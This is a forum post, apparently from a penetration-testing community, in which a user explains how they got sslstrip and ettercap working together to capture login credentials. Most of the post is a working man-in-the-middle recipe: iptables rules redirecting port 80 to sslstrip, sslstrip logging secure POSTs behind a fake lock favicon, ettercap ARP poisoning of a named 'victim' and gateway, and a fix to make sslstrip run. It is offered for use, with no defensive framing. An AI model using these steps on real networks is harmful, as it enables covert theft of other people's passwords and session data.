Issue with sslstrip and ettercap (Mitm attacks) (SOLVED)

[DangerousAltoid]

I've been scratching my head the last few days and finally found the answer to why I wasn't getting credentials to logins at sites.
A LOT of videos and how-to write ups for ettercap and sslstrip and everyone seems to say something different. I have to give credit to Maverick35 for leading me in this direction to find the answer
Other sites I've been to say to do the following (ex.):

#Open Terminal
#Redirects requests on port 80 to sslstrip running on port 10000

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000]

echo "1" > /proc/sys/net/ipv4/ip_forward

#You can check the forwarding if you want by typing:

cat /proc/sys/net/ip_forward

#You should see a "1" there

#New Terminal

#Run sslstrip logging on port 10000

sslstrip -p -f

#I use -p for log only SSL Posts. -f substitutes a lock favicon on secure requests

#(Optional) You can monitor the log

tail -F sslstrip.log

#Launch ettercap gui with packet dump

ettercap -G -w ~/ettercap_packets.pcap

#In Ettercap enter unified sniffing

Sniff->Unified Sniffing

#Select your interface

wlan0 (example)

#Scan for hosts

Hosts->Scan for hosts

#View hosts list for scan

Hosts->Hosts list

#Select Targets

Highlight the victim -> Add to Target 1
Highlight the victim -> Add to Target 2

#View the added targets

Targets -> Current Targets

#Perform Arp poisoning (Mitm attack) on targets

Mitm -> Arp Poisoning (Sniff remote connections)

#Start

Start -> Start Sniffing

This was giving me no love here. If you man ettercap you will see that ettercap already does the forwarding for you (/proc/sys/net/ipv4/ip_forward) so there is no need to do it. In fact if you run ettercap after you type in that command it will just set the (/proc/sys/net/ipv4/ip_forward) back to "0" afterwards. Try cat /proc/sys/net/ipv4/ip_forward after running ettercap and you will see it will set the kernel to "0". It describes it in the man page.

The real issue I was having was with sslstrip. I didn't know it until a little while ago. I wasn't getting credentials on all sites like I was hoping. Come to find out sslstrip (I'm using .9 version) only works with python 2.5 and up. If you look at the sslstrip.py file at gedit /pentest/web/sslstrip/sslstrip.py you will see at the top:

#!/usr/bin/env python

#You need to change it to:

#!/usr/bin/python2.6

The quickest way to setup everyting for me and have it working is without GUI and just type below:

iptables -t nat --flush (To flush any added rules to the nat tables)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -f (only logging https and uses the Favicon)

OPEN another terminal:
ettercap -Tqi "your interface" -M arp:remote /Victim/ /Gateway/ -P autoadd (you can also just do // /Gateway/ , if you want to get all targets)

Thats it. After that everything was working smooth.